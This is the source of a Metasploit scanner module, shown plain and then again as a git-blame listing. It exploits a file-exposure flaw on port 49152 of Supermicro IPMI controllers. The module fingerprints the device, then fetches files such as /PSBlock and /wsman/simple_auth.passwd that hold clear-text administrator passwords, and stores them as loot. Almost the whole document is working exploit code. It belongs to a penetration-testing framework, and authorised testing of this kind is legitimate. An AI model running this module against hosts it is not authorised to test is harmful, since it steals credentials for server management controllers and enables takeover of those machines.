metasploit-framework/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'uri'
class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report


  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',
      'Description' => %q{
        This module abuses a file exposure vulnerability accessible through the web interface
        on port 49152 of Supermicro Onboard IPMI controllers.  The vulnerability allows an attacker
        to obtain detailed device information and download data files containing the clear-text
        usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs
        were exposed to the internet with this vulnerability.
      },
      'Author'       =>
        [
          'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis
          'John Matherly <jmath[at]shodan.io>',    # Internet-wide scan
          'Dan Farmer <zen[at]fish2.com>',         # Additional investigation
          'hdm'                                    # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],
          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
        ],
      'DisclosureDate' => 'Jun 19 2014'))

    register_options(
      [
        Opt::RPORT(49152)
      ])
  end

  def is_supermicro?
    res = send_request_cgi(
      {
        "uri"       => "/IPMIdevicedesc.xml",
        "method"    => "GET"
      })

    if res && res.code == 200 && res.body.to_s =~ /supermicro/i
      path = store_loot(
        'supermicro.ipmi.devicexml',
        'text/xml',
        rhost,
        res.body.to_s,
        'IPMIdevicedesc.xml'
      )
      print_good("Stored the device description XML in #{path}")
      return true
    else
      return false
    end
  end


  def run_host(ip)

    unless is_supermicro?
      vprint_error("This does not appear to be a Supermicro IPMI controller")
      return
    end

    candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }

    candidates.each do |uri|
      res = send_request_cgi(
        {
          "uri"       => uri,
          "method"    => "GET"
        })

      next unless res

      unless res.code == 200 && res.body.length > 0
        vprint_status("Request for #{uri} resulted in #{res.code}")
        next
      end

      path = store_loot(
        'supermicro.ipmi.passwords',
        'application/octet-stream',
        rhost,
        res.body.to_s,
        uri.split('/').last
      )
      print_good("Password data from #{uri} stored to #{path}")
    end
  end

end
Supermicro work 2014-06-11 20:03:54 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Supermicro work 2014-06-11 20:03:54 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'uri'`
use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Supermicro work 2014-06-11 20:03:54 +00:00
			`include Msf::Exploit::Remote::HttpClient`
Fix up scanner mixin usage, actual test/bug fix 2014-06-12 16:52:34 +00:00			`include Msf::Auxiliary::Scanner`
Supermicro work 2014-06-11 20:03:54 +00:00			`include Msf::Auxiliary::Report`
Fix msftidy and favor && over and 2014-06-20 22:21:10 +00:00
Supermicro work 2014-06-11 20:03:54 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',`
			`'Description' => %q{`
Fix msftidy and favor && over and 2014-06-20 22:21:10 +00:00			`This module abuses a file exposure vulnerability accessible through the web interface`
Supermicro work 2014-06-11 20:03:54 +00:00			`on port 49152 of Supermicro Onboard IPMI controllers. The vulnerability allows an attacker`
			`to obtain detailed device information and download data files containing the clear-text`
Fix msftidy and favor && over and 2014-06-20 22:21:10 +00:00			`usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs`
Supermicro work 2014-06-11 20:03:54 +00:00			`were exposed to the internet with this vulnerability.`
			`},`
			`'Author' =>`
			`[`
			`'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis`
			`'John Matherly <jmath[at]shodan.io>', # Internet-wide scan`
			`'Dan Farmer <zen[at]fish2.com>', # Additional investigation`
			`'hdm' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Add the final cari.net URL 2014-06-19 20:33:06 +00:00			`[ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],`
Supermicro work 2014-06-11 20:03:54 +00:00			`[ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']`
			`],`
Fix the disclosure date 2014-06-19 20:36:17 +00:00			`'DisclosureDate' => 'Jun 19 2014'))`
Supermicro work 2014-06-11 20:03:54 +00:00
			`register_options(`
			`[`
			`Opt::RPORT(49152)`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Supermicro work 2014-06-11 20:03:54 +00:00			`end`

			`def is_supermicro?`
			`res = send_request_cgi(`
			`{`
			`"uri" => "/IPMIdevicedesc.xml",`
			`"method" => "GET"`
			`})`

Fix msftidy and favor && over and 2014-06-20 22:21:10 +00:00			`if res && res.code == 200 && res.body.to_s =~ /supermicro/i`
Supermicro work 2014-06-11 20:03:54 +00:00			`path = store_loot(`
			`'supermicro.ipmi.devicexml',`
			`'text/xml',`
			`rhost,`
			`res.body.to_s,`
			`'IPMIdevicedesc.xml'`
			`)`
Do the same for aux modules 2016-02-01 22:06:34 +00:00			`print_good("Stored the device description XML in #{path}")`
Supermicro work 2014-06-11 20:03:54 +00:00			`return true`
			`else`
			`return false`
			`end`
			`end`


Fix up scanner mixin usage, actual test/bug fix 2014-06-12 16:52:34 +00:00			`def run_host(ip)`

Supermicro work 2014-06-11 20:03:54 +00:00			`unless is_supermicro?`
Do the same for aux modules 2016-02-01 22:06:34 +00:00			`vprint_error("This does not appear to be a Supermicro IPMI controller")`
Supermicro work 2014-06-11 20:03:54 +00:00			`return`
			`end`

			`candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }`

			`candidates.each do \|uri\|`
			`res = send_request_cgi(`
			`{`
			`"uri" => uri,`
			`"method" => "GET"`
			`})`

Fix up scanner mixin usage, actual test/bug fix 2014-06-12 16:52:34 +00:00			`next unless res`

Fix msftidy and favor && over and 2014-06-20 22:21:10 +00:00			`unless res.code == 200 && res.body.length > 0`
Do the same for aux modules 2016-02-01 22:06:34 +00:00			`vprint_status("Request for #{uri} resulted in #{res.code}")`
Fix up scanner mixin usage, actual test/bug fix 2014-06-12 16:52:34 +00:00			`next`
Supermicro work 2014-06-11 20:03:54 +00:00			`end`

			`path = store_loot(`
			`'supermicro.ipmi.passwords',`
			`'application/octet-stream',`
			`rhost,`
			`res.body.to_s,`
Fix up scanner mixin usage, actual test/bug fix 2014-06-12 16:52:34 +00:00			`uri.split('/').last`
Supermicro work 2014-06-11 20:03:54 +00:00			`)`
Do the same for aux modules 2016-02-01 22:06:34 +00:00			`print_good("Password data from #{uri} stored to #{path}")`
Supermicro work 2014-06-11 20:03:54 +00:00			`end`
			`end`

			`end`